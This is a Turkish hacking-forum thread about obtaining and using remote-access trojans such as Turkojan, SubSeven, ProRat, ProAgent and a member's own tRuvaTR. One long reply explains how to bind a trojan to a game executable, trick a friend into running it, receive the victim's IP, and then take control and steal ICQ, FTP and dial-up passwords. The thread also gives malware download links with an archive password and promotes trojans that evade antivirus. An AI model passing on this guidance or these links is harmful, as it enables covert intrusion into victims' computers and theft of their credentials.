folder Tahribat.com Forumları
linefolder Bilgisayar Güvenliği - Backdoorlar
linefolder Turkojan Download Yapmak İstiyorum Link Yazarsanız Sevinir

Turkojan Download Yapmak İstiyorum Link Yazarsanız Sevinir

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    burakerk
    burakerk's avatar
    Erkek
    iyibilen biri cevaplarsa sevinirim trojanları açtığımızda norton alert veriyo bu onunda trojan içerdiğinin mi göstergesi? güvenipte nortonu kapatmalımıyım....

sonun başlangıcı!!
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Erkek

Eveeet :))

İlk başta nortonun alarm vermesi ile ilgili konuşalım..

Kullandığın trojan serverları en son olurşurulduğunda (bazılarında başta gelebilior) trojanı bulaştırmaya hazır olan exe olduğundan dolayı ve bazı trojan clientleri serverı kendi içinde oluşturabildiklerinden dolayı kendi içlerinde serverın kodlarını taşıdıklarından dolayı norton gibi antivirüs programları alarm verebilior.. bu demek oluyorki kendi trojanlarınızda nortonun alar vermesinden direk korkmayın..

fakat bazı önemli nolktalar var... bazı trojanlarda mesela schoolbus.. kurulduğu makinadaki şifreleri (mail isp gibi.) kendi programerınada gönderiyor... onun için her trojanı kullanmayın...

Ben şu anda olmasada eskiden baya bir uraşmışlığım var. hatta trojan yedirme ve saklama konusunda uzmanım diyebilirim.. Hemen hatırlatıyımki trojan göndermekle hacker olunmaz.. eğer bir insan trojan yedirip bu şekilde ben hackerım diyorsa ona direk lamer damgası vrabilirsiniz(genel olarak hacker demek izinsiz bilgi alan anlamına gelmekle beraber burada siz bir şeyi izinnsiz almıyorsunuz karşıdakinin işi bilmediğinden veya saflığında faydalanıyorsunuz.). Hadi gaza geldim herşeyi yazalım bari...

İlk olarak bir arkadaşımız yukarıda demiş.. trojan serverı ile bir site hackleyemezsiniz en azından doğrudan hackleyemezsiniz. trojanlar ile bir pc ye izinsiz girebilirsiniz.. bir örnek verelim.. mesela bir arkadaşınıza bir disket içinde oyun götürürken oyunu arasına serverı oyunun exesiile birleştirebilir ve onun o bilgisayarda açmasını sağlayabilrsiniz. o andan itibaret serverımız aktif hale geçecektir ve o bilgisayar internete bağlandığı anda size ilk olarak mail icq msn mirc ile o bilgisayarın ipsini haber verecektir server. şu bilgisayar şu ip ile şu saatte bağlandı die. ve o anda siz elinizdeki programın clienti ne oradaki ip ve port bilgilerini yazarak o bilgisayara bağlanabilrisiniz..

o anda itibarewn connecting server yazar ve ardından bağlanır.. ve siz bağlandığınz bilgisayardan cdrom monitor acıp kapamaya.. internet bağlantı şifreleri icq msn şifreleri çalmaya. dosya aktarımı yapmaktan virüs yollamaya.. windowsu bozmaktan ekran koruyucu şifresini değiştirmye kadar aklına gelecek herşeyi yapabilirsiniz.. bu yöntem ile.. mesela bu kişi ftplere bağlanıyor ise C:\belgelerim klasöründen ftp programının yada ilgili klasörlerden dataları alıp kırabilir. icq dizininden icq.dat larını çalıp icq şifrelerini kırabilir yani aklınıza gelecek heşeyi yapabilirsiniz.

Hangi trojanı kullanmalı?? Bu konuda turkojanı ben pek sevmiyorum açıkcası.. çünkü eskiden norton filan yakalamıyoda ama şu anda herşeyi yakalıyor.. eğer karşıda antivirüs gibi bir dosyanın olmadığından eminseniz o zaman en babası olan trojanın atalarından birsi olan subseven 2.2 yikullanın(dosya arşivinden indirebilirsiniz.) bu trojanını skin desteğine kadar herşey var.. en babasi hiç bir zaman vazgeçmeyin.. en azından kendisi bilgisayarınıza trojan sokmuyor :) eğer karşıda antivirüs var diyorsanız o zaman prorat 1.4 ü kulllanın.. ilk çıktığında test ettim ve gerçekten iyi iş çıakrmışlar :) ingilizceniz yoksada olabilir..

bir tojan serverını kendi bilgisayarınıza bulaşıp bulaşmadını anlamak için.. bağlantı ipsine 127.0.0.1 yazın.. bu sizi kendi bilgisayarınıza başlamaya çalışacaktır.. eğer bağlanırsa telaşe kapılamyın... kendi bilgisayarınıza bağlanıp remove server diyin.. bu kendi bilgisayarınızdaki serverı kaldırır.

şuanda aklıma gelenler bunlar eğer bişey olursa söyleyin cevaplıyım.

http://www.protoplist.com/customize/language/backup/yedek/ProRat_v1.4.zip şifre pro

Sanıyorum kendi atasözümü yaptım, kaynak belirterek kullanabilirsiniz. 10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Not : Söyleyeni belli olduğu için(Ben) atasözü değil, özlüsöz oluyormuş, dolayısı ile kendi özlüsözümü yapmış oldum :)
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    CeLL_O-Mc
    CeLL_O-Mc's avatar
    Erkek

selam server.exe dosyasını yapmak için turkojanın içinde yani klasörde sever editör var ordan yapıyosun ve yolluyosun:

CeLL_O-Mc 1990

XxX-M@NY@XxX 199o ¨¯¤¯¾ He®KêS LåM€® ôLãßiLi® åMã Hã©Kꮹ ãSLå ¹³²¯¤¯¾
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ttx14c
    ttx14c's avatar
    Erkek
    tRuvaTR yi deneyin.  http://programvb.sitemynet.com  .  Antiviruslere yakalanmıyo.  Ama diyerleri gibi Geniş özellikleri yok. Dosya transfer yapabilirsiniz,  Klasörlerde gezebilirsiniz, ekran görüntüsü alabilirsiniz falan .....   Bunu kendim için yapmıştım. Daha sonra Biraz modifiye edip Kullanıcılara sundum, istiyen deniyebilir.

onLy tTx14c (TechnoLogy) (tTime)
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    CeLL_O-Mc
    CeLL_O-Mc's avatar
    Erkek
    evet truvatr güzel antivirüs programları virüs olarak algılamıyo TrojanMasters bu arada hoş geldin bilgiler saklanmak için değil paylaşılmak için vardır link ver herkes yararlansın

6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    CeLL_O-Mc
    CeLL_O-Mc's avatar
    Erkek
    proagent i burdan indirebilirsiniz http://members.lycos.co.uk/trscorched/index.html yanında bi kaç gerekli programda var

7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ttx14c
    ttx14c's avatar
    Erkek

Yakında tRuvaTR nin Silver versionunu Downloada koyucam (Gereksiz özellikler Olmıycak, Amaç Hızlı Dosya Transferi  olıcak ve gizlilik :)  ) , Daha sonrada Gold versionunu çıkarıcam. O  çok daha iyi olıcak , Ama daha Proje aşamasında 2 ayı bulur.

Tabi en güzel yanıda Antiviruslere yakalanmaması Olıcak ...   

Hatta tahribat.com uyelerinden  Bu projelerde Testerz olmak istiyen varsa  ttx14c@mail.com a mail atabilirler. Zamanı geldiğinde kendilerine ulaşırım. Zaten bu konuyu Gold versionu tamamlandıgında tekrar açıklıycam.  

onLy tTx14c (TechnoLogy) (tTime)
Toplam Hit: 9176 Toplam Mesaj: 18